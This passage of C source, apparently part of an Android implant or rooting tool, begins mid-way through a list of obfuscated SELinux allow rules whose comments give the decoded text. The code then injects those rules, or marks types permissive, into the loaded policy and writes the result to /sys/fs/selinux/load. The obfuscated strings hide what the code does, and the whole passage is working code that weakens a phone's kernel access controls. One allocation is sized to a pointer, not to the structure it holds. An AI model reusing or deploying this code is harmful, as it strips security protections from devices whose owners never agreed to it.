    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:system_file:lnk_file:unlink"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x33\x39\x37\x3e\x35\x0c\x0e\x33\x39", // "allow:recovery:rootfs:file:entrypoint"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x3e\x30\xdc\x35\x39\x37\x06\x00\x0a", // "allow:recovery:recovery:capability:sys_ptrace"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x3a\x0e\x09", // "allow:recovery:recovery:capability:setuid"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x0a\x39\x04\x0e\x09", // "allow:recovery:recovery:capability:setgid"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x33\x0c\x06\x39\x30\x0a\x00\x3a\x37\x0a", // "allow:init:recovery:process:noatsecure"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x30\x0e\x04\x0e\x33\x0d", // "allow:init:recovery:process:siginh"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x37\x31\x0e\x32\x0e\x39\x0e\x33\x0d", // "allow:init:recovery:process:rlimitinh"

  };





void *cmalloc(size_t s) {
  void *t = malloc(s);
  if (t == NULL) {
    LOGD("Out of memory\n");
    exit(1);
  }
  return t;
}

int add_rule(char *s, char *t, char *c, char *p, policydb_t *policy) {
  type_datum_t *src, *tgt;
  class_datum_t *cls;
  perm_datum_t *perm;
  avtab_datum_t *av;
  avtab_key_t key;

  src = hashtab_search(policy->p_types.table, s);
  if (src == NULL) {
    LOGD("source type %s does not exist\n", s);
    return 2;
  }
  tgt = hashtab_search(policy->p_types.table, t);
  if (tgt == NULL) {
    LOGD("target type %s does not exist\n", t);
    return 2;
  }
  cls = hashtab_search(policy->p_classes.table, c);
  if (cls == NULL) {
    LOGD("class %s does not exist\n", c);
    return 2;
  }
  perm = hashtab_search(cls->permissions.table, p);
  if (perm == NULL) {
    if (cls->comdatum == NULL) {
      LOGD("perm %s does not exist in class %s\n", p, c);
      return 2;
    }
    perm = hashtab_search(cls->comdatum->permissions.table, p);
    if (perm == NULL) {
      LOGD("perm %s does not exist in class %s\n", p, c);
      return 2;
    }
  }

  // See if there is already a rule
  key.source_type = src->s.value;
  key.target_type = tgt->s.value;
  key.target_class = cls->s.value;
  key.specified = AVTAB_ALLOWED;
  av = avtab_search(&policy->te_avtab, &key);

  if (av == NULL) {
    av = cmalloc(sizeof av);
    av->data |= 1U << (perm->s.value - 1);
    int ret = avtab_insert(&policy->te_avtab, &key, av);
    if (ret) {
      LOGD("Error inserting into avtab\n");
      return 1;
    }	
  }

  av->data |= 1U << (perm->s.value - 1);

  return 0;
}

int load_policy(char *filename, policydb_t *policydb, struct policy_file *pf) {
  int fd;
  struct stat sb;
  void *map;
  int ret;

  fd = open(filename, O_RDONLY);
  if (fd < 0) {
    LOGD("Can't open '%s':  %s\n",
	 filename, strerror(errno));
    return 1;
  }
  if (fstat(fd, &sb) < 0) {
    LOGD("Can't stat '%s':  %s\n",
	 filename, strerror(errno));
    return 1;
  }
  map = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE,
	     fd, 0);
  if (map == MAP_FAILED) {
    LOGD("Can't mmap '%s':  %s\n",
	 filename, strerror(errno));
    close(fd);
    return 1;
  }

  policy_file_init(pf);
  pf->type = PF_USE_MEMORY;
  pf->data = map;
  pf->len = sb.st_size;
  if (policydb_init(policydb)) {
    LOGD("policydb_init: Out of memory!\n");
    munmap(map, sb.st_size);
    close(fd);
    return 1;
  }
  ret = policydb_read(policydb, pf, 1);
  if (ret) {
    LOGD("error(s) encountered while parsing configuration\n");
    munmap(map, sb.st_size);
    close(fd);
    return 1;
  }

  munmap(map, sb.st_size);
  close(fd);
  return 0;
}

int load_policy_into_kernel(policydb_t *policydb) {
  unsigned char load[] = "\x4b\x47\x18\xec\x38\x3e\x38\xec\x33\x38\xec\x38\x32\x29\x2e\x2b\xc2\x3d\xec\x29\x2c\x36\x31"; // "/sys/fs/selinux/load"

  char *filename = deobfuscate(load);
  int fd, ret;
  void *data = NULL;
  size_t len;

  policydb_to_image(NULL, policydb, &data, &len);

  // based on libselinux security_load_policy()
  fd = open(filename, O_RDWR);
  if (fd < 0) {
    LOGD("Can't open '%s':  %s\n",
	    filename, strerror(errno));
    return 1;
  }
  ret = write(fd, data, len);
  close(fd);
  if (ret < 0) {
    LOGD("Could not write policy to %s\n",
	    filename);
    return 1;
  }
  return 0;
}

int parse_add_rules(void) {
  char *policy = deobfuscate(obf_policy); 
  
  policydb_t policydb;
  struct policy_file pf, outpf;
  sidtab_t sidtab;
  int ch;
  int load = 0;
  FILE *fp;
  
  sepol_set_policydb(&policydb);
  sepol_set_sidtab(&sidtab);

  if (load_policy(policy, &policydb, &pf)) {
    LOGD("Could not load policy\n");
    return 1;
  }

  if (policydb_load_isids(&policydb, &sidtab))
    return 1;
  
  int n = sizeof(pol_list)/POLSIZE;
  int i = 0;
  char *rule = NULL;

  for(i = 0; i < n; i++) {
    rule = deobfuscate(pol_list[i]);
  
    char *req = strtok(rule, ":");
    if(req == NULL) {
      LOGD("No request\n");
      continue;
    }
    
    char *source = strtok(NULL, ":");
    if(source == NULL) {
      LOGD("No source\n");
      continue;
    }

    if(!strcmp(req,"permissive")) {
      type_datum_t *type;
      type = hashtab_search(policydb.p_types.table, source);
      if (type == NULL) {
	LOGD("type %s does not exist\n", source);
	continue;
      }
      if (ebitmap_set_bit(&policydb.permissive_map, type->s.value, 1)) {
	LOGD("Could not set bit in permissive map\n");
	continue;
      }

      LOGD("Permissive Done\n");
      continue;
    }
    
    char *target = strtok(NULL, ":");
    if(target == NULL) {
      LOGD("No target\n");
      continue;
    }

    char *class = strtok(NULL, ":");
    if(class == NULL) {
      LOGD("No class\n");
      continue;
    }
  
    char *perm = strtok(NULL, ":");
    if(perm == NULL) {
      LOGD("No perm\n");
      continue;
    }

    if ((!source || !target || !class || !perm))
      continue;

    int ret_add_rule;
    if (ret_add_rule = add_rule(source, target, class, perm, &policydb)) {
      LOGD("Could not add rule\n");
      continue;
    }
  }
  if (load_policy_into_kernel(&policydb)) {
    LOGD("Could not load new policy into kernel\n");
    return 1;
  }
  
  policydb_destroy(&policydb);

  return 0;
}


void adjust_selinux_policy(void) {

  struct stat fileStat;
  if(stat(deobfuscate(obf_policy),&fileStat) < 0) {
    LOGD("SELinux not presents\n");
    return;
  }

  parse_add_rules();

}
